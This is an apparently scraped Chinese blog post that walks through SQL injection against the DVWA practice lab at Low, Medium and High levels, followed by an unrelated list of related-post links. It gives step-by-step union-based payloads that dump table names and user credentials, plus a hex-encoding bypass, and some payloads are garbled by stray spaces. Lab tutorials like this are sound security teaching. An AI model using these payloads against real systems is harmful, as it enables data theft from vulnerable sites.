mysql回显_SQL回显
DVWA-SQL注入
DVWA是一个基于PHP和MySQL开发的漏洞测试平台
测试环境
应用程序: phpStudy(apache,php,mysql)
测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀
一、 SQL注入
SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。
二、手工注入常规思路
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定回显位置
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.得到数据
三、DVWA注入分析
先将DVWA的级别设置为LOW
1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sq1注入
2.判断sql是否存在注入,以及注入的类型。1’and’1’=’1
3.猜测SQL查询语句中的字段数,1’order by 1#
1’order by 2#
1’order by 3#
从上面两个图可以看出,SQL语句查询的表字段数是2,确定显示的位置(SQL语句查询之后的回显位置)
1’union select 1,2#从下图中可以看到有两个回显
查询当前的数据库,以及版本
1’union select version(),database() #
获取数据库中的表,1’union select 1,group_concat(table_name) from information_schema.tables where table_schema=database ()#
获取表中的字段名,1’union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’#
获取字段中的数据,1’union select user,password from users#
将DVWA的级别设置为Medium
中级加入了一些防御,不让用户输入,只提供选择(可用burpsuit抓包来绕过),分析源码可以看到对参数的使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。
通过burpsuit抓包,修改数据包,绕过防御。判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入。1 and 1=1#
猜解sql查询语句中的字段的个数,测试字段个数1,1 order by
1#
测试字段个数2,1 order by 2#
测试字段个数3,1 order by 3#。返回错误页面, 所以字段数为2
确定回显的位置,下图可以说明有2个回显位置,1 union select 1,2#
获取当前数据库的名称以及版本,
union select database(), version()#
获取数据库中的所有表,1 union select 1, group_ concat (table_ name) frominformation_ schema. tables where table_ schema=database()#
获取表中的所有字段名,考虑到单引号被转义,可以利用16 进制进行绕过。1union select 1, group_ concat (column_ name) from information_ schema. col umnswhere table_ name=0x7573657273#
获取字段中的数据,1union se lect user, password from users#
将DVWA的级别设置为High
将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过。
点开链接显示下图
发送1
查看源码
获得密码,1’ union select user, password from users#
将DVWA的级别设置为Impossible,分析源码可以看到使用了PD0技术,杜绝了SQL注入。
mysql回显_SQL回显相关推荐
- 移动平均函数对 RSI 交叉策略回测结果的显着影响
之前的文章"在 Elasticsearch 中回测 RSI 交叉策略",我们介绍了如何使用 Elasticsearch 实现相对强弱指数 (RSI) 指标以获得回测结果. 文章中相 ...
- mysql更新数据能回滚吗_mysql更新数据能回滚吗?如何实现呢?
不熟悉使用mysql数据库的朋友们,可能会对其有非常多的小问题,例如说,mysql更新数据可以回滚吗?我们应该如何去实现呢? 操作数据库时候难免会因为"大意"而误操作,需要快速恢复 ...
- 回文树/回文自动机 引入
回文树/回文自动机引入 在介绍这种数据结构之前,我们来回顾一下处理字符串的一些武器: 1.KMP.AC自动机 2.后缀三姐妹(后缀树,后缀数组,后缀自动机) 3.字符串hash 4.字符串dp 5.m ...
- SpringBoot中try/catch异常并回滚事务(自动回滚/手动回滚/部分回滚)
在Spring官方文档中说到,当Transaction内发生unchecked exception的时候,会自动rollback,但是当Transaction内发生checked exception时 ...
- 回文树(回文自动机) - URAL 1960 Palindromes and Super Abilities
Palindromes and Super Abilities Problem's Link: http://acm.timus.ru/problem.aspx?space=1&num=1 ...
- 最大回撤,最大回撤恢复时间与最大回撤持续期
概要 这两个概念在刚接触量化分析时,实在时折腾了许久,故在此作下总结. 最大回撤 最大回撤恢复时间 最大回撤持续期 图示 源代码 内容 最大回撤(Max Dra ...
- 科普:关于ES版的CPU(正显、不显、QS等)
@面码什么的最喜欢了 2016.7.1 1.背景知识 (1)CPU的推出过程大概分这几个步骤: ES1: 测试架构和工艺制程 ES2: 修正大量BUG, 这个时候的U已经能用了, 但还存在隐患 ES3 ...
- Python计算最大回撤、回撤天数
Python计算最大回撤.回撤天数 "回撤"的概念 回撤是投资或者交易中常见的一个名词,是指账户的资金减少.资金回撤的定义分很多种,这些定义之间差异微小,大同小异,一般而言,资金回 ...
- 集显、独显、核显、SOC、POP、微型计算机树莓派的资料
1.集显.独显.核显的概念与区别: 处理器集成显卡就是指集成在cpu内部的显卡,通常称为核心显卡(也叫APU),如Intel酷睿i3 i5 i7系列处理器以及AMD APU系列处理器中多数都集成了显卡 ...
- 台式机核显和独显切换
机型:成就 5090 核显:Intel® UHD Graphics 630 独显:NVIDIA GeForce RTX 2060 独显 切换 核显 关机 把主机后边的显示器接头从独显上拔下来插到主板上 ...
最新文章
- 谱聚类 Spectral Clustering
- Thymeleaf提取公共页面(从实例入手,以inspinia模板为例)
- U-Boot 之三 U-Boot 源码文件解析及移植过程详解
- Pentium 4处理器架构/微架构/流水线 (4) - NetBurst框图
- php怎么配置登录密码,如何给phpmyadmin设置登录密码
- nexus4恢复原生系统_深度好文!新浪微博架构师详析微博云原生技术的思考与实践...
- vpp flowprobe
- 一键logo生成器_如何做海报?公众号封面图?logo?词云?试试这几个设计网站,用过的都说好!...
- 【CSS3盒子模型新样式】boder-box
- html 手机底部广告,手机网站被UC浏览器强制嵌入推荐广告解决方案
- 客户的sample和项目计划
- 1.嵌入式之80C51单片机
- 英语 Yang liang 120 --180
- 拉结尔派遣任务辅助介绍 拉结尔快速升级脚本挂机工具
- http协议详解+https
- find 搜索关键字并显示文件名
- python忽略警告
- 中文标点符号 unicode 码 10进制以及16进制
- (转)Android开发常用工具类
- 关于LED金线的相关知识